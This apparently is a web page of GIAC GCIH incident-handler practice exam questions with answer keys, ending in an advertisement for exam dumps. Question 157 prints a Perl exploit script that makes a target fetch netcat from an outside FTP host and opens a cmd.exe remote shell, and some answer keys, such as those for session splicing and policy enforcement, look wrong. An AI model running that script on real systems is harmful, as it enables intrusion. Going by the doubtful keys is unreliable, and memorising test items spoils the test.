
[Jan-2024] GIAC GCIH Official Cert Guide PDF
Exam GCIH: GIAC Certified Incident Handler - ExamPrepAway
In addition to passing the exam, candidates must also meet certain requirements to earn the GCIH certification. These include completing a course in incident handling and response, submitting a practical assignment, and agreeing to the GIAC code of ethics. These requirements ensure that certified professionals have the necessary skills and knowledge to handle cybersecurity incidents and protect their organizations from cyber threats.
NEW QUESTION # 144
John is a malicious attacker. He illegally accesses the server of We-are-secure Inc. He then places a backdoor in the We-are-secure server and alters its log files. Which of the following steps of malicious hacking includes altering the server log files?
- A. Gaining access
- B. Covering tracks
- C. Reconnaissance
- D. Maintaining access
Answer: B
NEW QUESTION # 145
Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealthy at this point. Which of the following types of scan would be most accurate and reliable?
- A. ACK scan
- B. UDP scan
- C. TCP Connect scan
- D. FIN scan
Answer: C
NEW QUESTION # 146
Which of the following types of malware does not replicate itself but can spread only when the circumstances are beneficial?
- A. Worm
- B. Mass mailer
- C. Trojan horse
- D. Blended threat
Answer: C
Explanation:
Section: Volume B
NEW QUESTION # 147
Windump is a Windows port of the well-known tcpdump packet sniffer, which is available on a variety of platforms. In order to use this tool on the Windows platform, a user must install a packet capture library. What is the name of this library?
- A. PCAP
- B. SysPCap
- C. WinPCap
- D. libpcap
Answer: C
NEW QUESTION # 148
Which of the following is a reason to implement security logging on a DNS server?
- A. For measuring a DNS server's performance
- B. For recording the number of queries resolved
- C. For monitoring unauthorized zone transfer
- D. For preventing malware attacks on a DNS server
Answer: C
Explanation:
Section: Volume A
NEW QUESTION # 149
Session splicing is an IDS evasion technique in which an attacker delivers data in multiple small-sized packets to the target computer. Hence, it becomes very difficult for an IDS to detect the attack signatures of such attacks. Which of the following tools can be used to perform session splicing attacks?
Each correct answer represents a complete solution. Choose all that apply.
- A. Fragroute
- B. Y.A.T.
- C. Nessus
- D. Whisker
Answer: C,D
NEW QUESTION # 150
Adam, a novice computer user, works primarily from home as a medical professional. He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Adam uses antivirus software, anti-spyware software, and keeps the computer up-to-date with Microsoft patches. After another month of working on the computer, Adam finds that his computer is even more noticeably slow. He also notices a window or two pop up on his screen, but they quickly disappear. He has seen these windows show up even when he has not been on the Internet. Adam notices that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Adam thinks this is very odd.
Which of the following is the most likely cause of the problem?
- A. Computer is infected with the stealth kernel level rootkit.
- B. Computer is infected with stealth virus.
- C. Computer is infected with the Self-Replication Worm.
- D. Computer is infected with the Stealth Trojan Virus.
Answer: A
NEW QUESTION # 151
Which of the following hacking tools provides shell access over ICMP?
- A. Nmap
- B. John the Ripper
- C. Nessus
- D. Loki
Answer: D
NEW QUESTION # 152
Which of the following tools can be used as penetration tools in the Information system auditing process?
Each correct answer represents a complete solution. Choose two.
- A. Nmap
- B. Snort
- C. SARA
- D. Nessus
Answer: C,D
Explanation:
Section: Volume B
NEW QUESTION # 153
The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?
- A. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
- C. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
- D. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"
Answer: D
NEW QUESTION # 154
You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. An attacker uses software that keeps trying password combinations until the correct password is found. Which type of attack is this?
- A. Man-in-the-middle
- B. Brute Force
- C. Denial-of-Service
- D. Vulnerability
Answer: B
NEW QUESTION # 155
Which of the following incident response team members ensures that the policies of the organization are enforced during the incident response?
- A. Information Security representative
- B. Legal representative
- C. Human Resource
- D. Technical representative
Answer: C
NEW QUESTION # 156
Which of the following types of rootkits replaces regular application binaries with Trojan fakes and modifies the behavior of existing applications using hooks, patches, or injected code?
- A. Hypervisor rootkit
- B. Kernel level rootkit
- C. Application level rootkit
- D. Boot loader rootkit
Answer: C
NEW QUESTION # 157
Adam, a malicious hacker, performs an exploit, which is given below:

#####################################################
$port = 53;                  # Spawn cmd.exe on port X
$your = "192.168.1.1";       # Your FTP Server 89
$user = "Anonymous";         # login as
$pass = '[email protected]';   # password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);

Which of the following is the expected result of the above exploit?
- A. Creates an FTP server with write permissions enabled
- B. Opens up a SMTP server that requires no username or password
- C. Opens up a telnet listener that requires no username or password
- D. Creates a share called "sasfile" on the target system
Answer: C
Explanation:
Section: Volume A
NEW QUESTION # 158
In which of the following attacks does an attacker spoof the source address in IP packets that are sent to the victim?
- A. DDoS
- B. Backscatter
- C. SQL injection
- D. DoS
Answer: B
Explanation:
Section: Volume B
NEW QUESTION # 159
......
GIAC GCIH certification exam is an essential qualification for security professionals who want to demonstrate their expertise in incident handling and response. It is a challenging exam that requires extensive knowledge and experience in the field, but it can help individuals advance their careers and gain recognition in the industry. GIAC Certified Incident Handler certification is widely recognized and respected by leading organizations worldwide, and it can help individuals stand out in a competitive job market.
GIAC GCIH Certification Exam is an excellent way for security professionals and incident handlers to validate their skills and knowledge in the field of incident handling and response. By earning this certification, individuals can demonstrate their expertise to employers and clients, and enhance their career prospects in the field of cybersecurity.
Free GCIH Exam Dumps to Improve Exam Score: https://ucertify.examprepaway.com/GIAC/braindumps.GCIH.ete.file.html